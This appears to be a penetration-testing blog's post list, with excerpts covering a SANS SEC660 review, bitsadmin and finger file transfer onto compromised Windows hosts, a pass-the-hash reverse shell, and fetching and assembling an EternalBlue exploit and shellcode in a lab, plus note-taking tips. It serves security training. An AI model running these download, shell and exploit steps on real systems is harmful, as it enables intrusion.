Skip to main content

Posts

GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma
Recent posts

Use bitsadmin For File Transfer

On Kali : Set up an HTTP listener someplace where the wget.exe file can be fetched: cd /usr/share/windows-binaries/ python -m SimpleHTTPServer 80 On Windows : Create or change to a directory where your current user has permissions to create files: mkdir \temp cd \temp Get the wget.exe file: set HOSTIP=10.0.0.22 cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe" Tested and working on default installs of: Windows Vista 32 bit Windows vista 64 bit Windows server 2008 standard SP1 32 bit Windows 7 SP1 32 bit Windows 7 SP1 64 bit Windows 8 32 bit Windows 8 64 bit Windows server 2012 64 bit Did not work on Windows versions prior to Vista and is deprecated and not working on Windows 10.

Use Finger To Download

Today I saw a twitter post by @DissectMalware about using finger to download data. I thought I would try it and see if I could find a good purpose for it (it is limited to textual data). One annoying thing I find is when attempting to do file transfer on a Windows host that does not have a TFTP client or PowerShell. The solution is to paste in a 25 line VBScript. This wouldn't be so bad but usually I find I am restricted on a shell to pasting in at most 5 lines at a time and sometimes even less without corruption of the resulting script. The only way to know if the resulting script was successfully pasted is to type it out and examine all 25 lines (if they all made it into the file). Just running the script without knowing it is correct risks losing the shell. I have hung my shell more than once. By the way don't bother trying the FTP client. The challenge is more than just that you have to create a script file so you can run it non-interactively. Besides having Windows Def

pth-wmis and Combined PowerShell and CMD Reverse Shell

Useful Background: http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html Resource: Combined PowerShell and CMD Reverse Shell Purpose: Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis). Disclaimer: These scripts are provided for educational purposes only and for use by Ethical Hackers. Use only on systems for which you have acquired all the legally required contracts and permissions for use. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warrantee or guarantees are provided. Attacking Box: 32bit Offsec VM - Kali Target Box: Windows 7 Professional Service Pack 1 We Have A Hash From another compromised box on the same network we have captured the local Administrator's hash:

Eternalblue test for Windows Server Standard 2008 SP1 32bit

This is a test of an Eternalblue exploit script from worawit: https://github.com/worawit/MS17-010/blob/master/eternalblue_exploit7.py The script claims to have been tested on : - Windows 7 SP1 x64   - Windows 2008 R2 SP1 x64   - Windows 7 SP1 x86   - Windows 2008 SP1 x64   - Windows 2008 SP1 x86 Get the main script : wget https://github.com/worawit/MS17-010/raw/master/eternalblue_exploit7.py dos2unix eternalblue_exploit7.py There is some shellcode required that has to be assembled. I downloaded and installed NASM on a Windows VM. On my Windows 7 32 bit VM I downloaded the kernel shellcode from : https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x86.asm I saved the shellcode into a file called : sc_x86_kernel.asm The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file. C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x86_ker

Keepnote Notes

Keepnote Quite a while ago I decided to embark on the journey towards the OSCP certification . One of the recommended applications for keeping notes during the penetration test of the lab environment and eventually the exam is the Keepnote application . This blog post is just a few tips that I have compiled on my way towards successfully using Keepnote. Keeping It Synchronized Across Systems One of the first challenges that I have run into is the strategy for keeping a Keepnote notebook synchronized between computers. I suppose one option is to simply store and access the notebook from a USB key.  This doesn't work for me since my strategy concerning USB keys is to never walk away from a computer while a USB key remains inserted into it. This is especially important when you are in a work environment or other potentially hostile environment where your USB Key (or external drive) could be swiped or infected by a 3rd party etc.. I found that copying the Keepnote